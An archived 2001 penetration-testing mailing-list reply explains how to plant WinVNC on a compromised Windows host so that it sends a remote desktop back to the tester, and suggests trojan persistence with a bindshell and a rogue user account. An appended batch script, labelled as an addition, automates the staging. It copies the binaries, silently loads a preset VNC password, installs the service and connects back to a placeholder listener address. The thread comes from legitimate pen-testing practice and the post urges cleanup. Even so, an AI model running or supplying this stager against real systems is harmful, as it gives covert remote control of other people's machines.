Penetration Testing mailing list archives

Re: Problems on the DOS-Prompt


From: H D Moore <hdm () secureaustin com>
Date: Tue, 18 Sep 2001 11:23:18 -0500

On Sunday 16 September 2001 04:18 pm, Rainer Duffner wrote:
> Hi,
> [ snip ]
> Even with hk.exe, NET USE fails. Is there an explanation ?

One strategy for getting an interactive network session is to install VNC 
remotely and send yourself back a desktop.  The basic steps:

1. Get SYSTEM privs.

2. Copy winvnc.exe, vnchooks.dll, and omnithread_rt.dll to c:\winnt\system32

3. Use reg.exe, regini.exe, or regedit (NT 4.0 only) to load the default 
registry settings, including the password to use. You can create one of these 
by setting up VNC on a local machine and dumping the registry tree.

4. Run vncviewer -listen on a machine that the target box can reach on port 
5500.  For hardcore firewalled environments you can redirect ports with 
fpipe, netcat, or ssh -R/-L.

5. execute winvnc -install, then net start winvnc, and finally winvnc 
-connect <yourip>, type in your password and use the desktop.

6. If an Admin is logged on, the game is over, you have his/her privs.  If 
you get a logon prompt, go create a user account then login with it ;)


You can also add a trojan to the registry Run keys, the startup folder, or 
the network logon scripts. Ideally this trojan would drop a bindshell running 
in the context of the user.  

Also, please be sure to _remove_ any trojans or VNC services you install, 
there's no point in paying for a security assessment/pen-test if you are worse 
off than when you started.  If anyone needs help getting the VNC setup going, 
email me, if enough people ask I will put up a tutorial...

-- 
H D Moore
http://www.digitaldefense.net - work
http://www.digitaloffense.net - play
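The six steps above collected into one batch file for the target's command prompt, added here as an example; it is not H D Moore's code and was not part of the original post. It assumes WinVNC 3.3.x (winvnc.exe, vnchooks.dll, omnithread_rt.dll) plus a winvnc.reg exported from your own working install, as the post describes, already staged in C:\TEMP\vnc; that the script runs from a SYSTEM-privileged prompt (step 1 is already done); and that your vncviewer -listen is reachable at 192.0.2.10 (placeholder address). The registry key path and the cleanup argument are assumptions, not from the post.

```batch
@echo off
rem Added example stager for the VNC-reverse-desktop steps in the post above.
rem Assumptions: files staged in %SRC%, listener at %ATTACKER% (both placeholders).
rem Run with no arguments to install, "cleanup" to undo everything afterwards.

set SRC=C:\TEMP\vnc
set ATTACKER=192.0.2.10
set SYS=%SystemRoot%\system32

if "%1"=="cleanup" goto cleanup

rem Step 2: drop the server, its hook DLL and the omnithread runtime into system32.
copy %SRC%\winvnc.exe %SYS%\ >nul
copy %SRC%\vnchooks.dll %SYS%\ >nul
copy %SRC%\omnithread_rt.dll %SYS%\ >nul

rem Step 3: load the exported defaults silently (regedit /s never prompts).
rem Expected shape of winvnc.reg (assumed key path for a service-mode install;
rem the 8-byte Password value is the one exported from your own machine):
rem   REGEDIT4
rem   [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
rem   "Password"=hex:..,..,..,..,..,..,..,..
regedit /s %SRC%\winvnc.reg

rem Step 5: register the service, start it, then dial back to the listener
rem (winvnc -connect uses port 5500 on the viewer side by default).
%SYS%\winvnc.exe -install
net start winvnc
%SYS%\winvnc.exe -connect %ATTACKER%
echo Now switch to vncviewer -listen on %ATTACKER% and enter the password.
goto end

:cleanup
rem Undo in reverse order so the engagement leaves no running service behind.
net stop winvnc
%SYS%\winvnc.exe -remove
del %SYS%\winvnc.exe
del %SYS%\vnchooks.dll
del %SYS%\omnithread_rt.dll
rem A winvnc-undo.reg containing the line
rem   [-HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
rem deletes the whole key; write it beside winvnc.reg when you export.
regedit /s %SRC%\winvnc-undo.reg
echo VNC service, binaries and registry key removed.

:end
```

If the target cannot reach you directly on 5500, point %ATTACKER% at the host that forwards the port (fpipe, netcat, or an ssh -R tunnel as the post suggests) rather than at your own address, and verify with netstat on that host that the forward is listening before running the connect step.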
